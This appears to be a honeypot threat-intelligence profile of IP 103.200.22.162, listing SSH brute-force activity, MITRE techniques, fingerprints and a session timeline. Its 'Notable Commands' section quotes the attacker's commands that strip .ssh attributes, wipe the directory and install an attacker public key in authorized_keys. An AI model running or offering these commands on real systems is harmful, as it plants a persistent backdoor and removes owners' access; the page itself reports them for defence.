IntrusionLabs / threat intelligence

Sign in

← Back to feed

103.200.22.162

Threat Confidence

50%

Location

🇻🇳 VN

ASN

AS135905 · VIETNAM POSTS AND TELECOMMUNICATIONS GROUP

Cloud Provider

—

Total Events

269

Top 10% by volume

Agent Count

1

First / Last Seen

2026-04-09 18:29 — 2026-04-09 18:59

Attack Types

ssh:bruteforce

MITRE ATT&CK Techniques

Initial Access

T1078

Defense Evasion

T1070.004

Credential Access

T1110 T1110.001

Command and Control

T1105

External Corroboration

Not flagged by any external feeds

Campaigns

AS135905 VIETNAM POSTS AND TELECOMMUNICATIONS GROUP ASN Active medium 🇻🇳 VN

5 IPs 1983 events

2026-02-16 — ongoing · 5 IPs from the same network (VIETNAM POSTS AND TELECOMMUNICATIONS GROUP, AS135905) were active during overlapping time periods. …

Session Forensics

malware_dropper ×8 credential_harvester ×25 opportunistic_bruter ×8

Sessions

41 (16 with login)

Avg Depth Score

0.51

Commands Executed

24

Files Downloaded

8

Notable Commands

cd ~; chattr -ia .ssh; lockr -ia .ssh
lockr -ia .ssh
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

Fingerprints

HASSH

03a80b21afa810682a776a7d42e5e6fb

SSH Client

SSH-2.0-libssh_0.11.1

Evidence Timeline

Credential Harvester 32928cdac05a w4m_seattle_01 · 2026-04-09 18:59

1 35%

Loading events...

Opportunistic Bruter b546b4a4b577 w4m_seattle_01 · 2026-04-09 18:58

1 50%

Loading events...

Malware Dropper 24da5bb6ed2c w4m_seattle_01 · 2026-04-09 18:58

3 1 1 100%

Loading events...

Credential Harvester 8001eedf20d6 w4m_seattle_01 · 2026-04-09 18:58

1 35%

Loading events...

Credential Harvester 5d942553f253 w4m_seattle_01 · 2026-04-09 18:56

1 35%

Loading events...

Credential Harvester 4ad8e3aafc47 w4m_seattle_01 · 2026-04-09 18:55

1 35%

Loading events...

Credential Harvester d429d1216b5f w4m_seattle_01 · 2026-04-09 18:54

1 35%

Loading events...

Credential Harvester bddd30d820f0 w4m_seattle_01 · 2026-04-09 18:53

1 35%

Loading events...

Credential Harvester 50c658c39570 w4m_seattle_01 · 2026-04-09 18:52

1 35%

Loading events...

Opportunistic Bruter 2a6d10c1c485 w4m_seattle_01 · 2026-04-09 18:50

1 50%

Loading events...

Malware Dropper 338f164c2577 w4m_seattle_01 · 2026-04-09 18:50

3 1 1 100%

Loading events...

Credential Harvester 80b023db02db w4m_seattle_01 · 2026-04-09 18:50

1 35%

Loading events...

Credential Harvester 6bd36790deb7 w4m_seattle_01 · 2026-04-09 18:49

1 35%

Loading events...

Opportunistic Bruter 43d204954908 w4m_seattle_01 · 2026-04-09 18:48

1 50%

Loading events...

Malware Dropper 06f90222b2a2 w4m_seattle_01 · 2026-04-09 18:48

3 1 1 100%

Loading events...

Credential Harvester 85dad3059965 w4m_seattle_01 · 2026-04-09 18:48

1 35%

Loading events...

Opportunistic Bruter 4583cf529291 w4m_seattle_01 · 2026-04-09 18:47

1 50%

Loading events...

Malware Dropper deef92120034 w4m_seattle_01 · 2026-04-09 18:47

3 1 1 100%

Loading events...

Credential Harvester c3dad1550960 w4m_seattle_01 · 2026-04-09 18:47

1 35%

Loading events...

Credential Harvester e5c69bbd46de w4m_seattle_01 · 2026-04-09 18:45

1 35%

Loading events...

Credential Harvester 0b9487a57872 w4m_seattle_01 · 2026-04-09 18:44

1 35%

Loading events...

Opportunistic Bruter 168bb27374df w4m_seattle_01 · 2026-04-09 18:43

1 50%

Loading events...

Malware Dropper 911f924a511c w4m_seattle_01 · 2026-04-09 18:43

3 1 1 100%

Loading events...

Credential Harvester b11cb4776761 w4m_seattle_01 · 2026-04-09 18:43

1 35%

Loading events...

Malware Dropper 76df7e571efa w4m_seattle_01 · 2026-04-09 18:42

3 1 1 100%

Loading events...

Opportunistic Bruter b54dd453b8b9 w4m_seattle_01 · 2026-04-09 18:42

1 50%

Loading events...

Credential Harvester ad18ffdcf1d7 w4m_seattle_01 · 2026-04-09 18:42

1 35%

Loading events...

Credential Harvester 382103c80a3b w4m_seattle_01 · 2026-04-09 18:40

1 35%

Loading events...

Malware Dropper 8d58cef931d4 w4m_seattle_01 · 2026-04-09 18:39

3 1 1 100%

Loading events...

Opportunistic Bruter 855e14c2adcc w4m_seattle_01 · 2026-04-09 18:39

1 50%

Loading events...

Credential Harvester 4a313d444d6e w4m_seattle_01 · 2026-04-09 18:39

1 35%

Loading events...

Credential Harvester 449bd9f604d4 w4m_seattle_01 · 2026-04-09 18:38

1 35%

Loading events...

Credential Harvester 190700a49f07 w4m_seattle_01 · 2026-04-09 18:36

1 35%

Loading events...

Credential Harvester 7fe641d54d7b w4m_seattle_01 · 2026-04-09 18:35

1 35%

Loading events...

Credential Harvester 40ca5981f7ce w4m_seattle_01 · 2026-04-09 18:34

1 35%

Loading events...

Opportunistic Bruter 5e6fc46d9623 w4m_seattle_01 · 2026-04-09 18:33

1 50%

Loading events...

Malware Dropper dd711062d278 w4m_seattle_01 · 2026-04-09 18:33

3 1 1 100%

Loading events...

Credential Harvester dcf336573dea w4m_seattle_01 · 2026-04-09 18:33

1 35%

Loading events...

Credential Harvester 2eb3d2d897be w4m_seattle_01 · 2026-04-09 18:32

1 35%

Loading events...

Credential Harvester b01311bf6f7e w4m_seattle_01 · 2026-04-09 18:30

1 35%

Loading events...

Credential Harvester 4bcbf8d8a283 w4m_seattle_01 · 2026-04-09 18:29

1 35%

Loading events...